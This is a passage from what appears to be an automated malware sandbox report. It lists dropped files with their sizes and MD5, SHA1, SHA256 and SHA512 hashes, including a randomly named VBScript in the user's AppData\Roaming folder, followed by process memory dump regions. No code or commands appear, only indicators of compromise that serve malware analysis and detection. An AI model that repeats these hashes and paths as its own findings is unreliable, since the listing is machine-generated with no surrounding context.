    7KB

    MD5

    6986373d35a03920d9e6e762a7c6240c

    SHA1

    a28cabad53ffed36d7c03e97f0cc043a64d4c562

    SHA256

    fe43bcb9e0d21a77786a9ebd39b82acd89e48795fb4ec1739105ea245992bdcc

    SHA512

    f164686d02c13816f37af5f8071e5d2e9ae6dcb3f427dd65b39c65cb8b6955fdfe2152cc93679f9a2c03dfdc29ba2c0c45575daee221be17e599714bb34ffdd3

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6986373d35a03920d9e6e762a7c6240c

    SHA1

    a28cabad53ffed36d7c03e97f0cc043a64d4c562

    SHA256

    fe43bcb9e0d21a77786a9ebd39b82acd89e48795fb4ec1739105ea245992bdcc

    SHA512

    f164686d02c13816f37af5f8071e5d2e9ae6dcb3f427dd65b39c65cb8b6955fdfe2152cc93679f9a2c03dfdc29ba2c0c45575daee221be17e599714bb34ffdd3

  • C:\Users\Admin\AppData\Roaming\unxggyus.vbs

    Filesize

    193KB

    MD5

    e2ee2593093262dbc88e11ce3e3f7669

    SHA1

    3c0cded1ad0a8abf8c6ba479caabf92a2815bec0

    SHA256

    742e8072d0787f6114d3db4574fdddeab9870159e9002cfd5806e64f28391d58

    SHA512

    7eb3d3228d01a46dc68457c4e85c5083a35b51ddd4174dd1c6cfac63ef2778a41540486c2c5af0a2a2c42cd701a0d794548b7b4410f87465a2c538fc9ea545e3

  • C:\Users\Admin\AppData\Roaming\unxggyus.vbs

    Filesize

    193KB

    MD5

    e2ee2593093262dbc88e11ce3e3f7669

    SHA1

    3c0cded1ad0a8abf8c6ba479caabf92a2815bec0

    SHA256

    742e8072d0787f6114d3db4574fdddeab9870159e9002cfd5806e64f28391d58

    SHA512

    7eb3d3228d01a46dc68457c4e85c5083a35b51ddd4174dd1c6cfac63ef2778a41540486c2c5af0a2a2c42cd701a0d794548b7b4410f87465a2c538fc9ea545e3

  • memory/1828-89-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB

  • memory/1828-24-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB

  • memory/1828-25-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB

  • memory/1988-1-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

    Filesize

    44KB

  • memory/1988-94-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

    Filesize

    44KB

  • memory/1988-93-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1988-12-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

    Filesize

    44KB

  • memory/1988-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2664-18-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2664-87-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB

  • memory/2664-17-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB

  • memory/2664-90-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB

  • memory/2664-16-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2664-15-0x000000006B8F0000-0x000000006BE9B000-memory.dmp

    Filesize

    5.7MB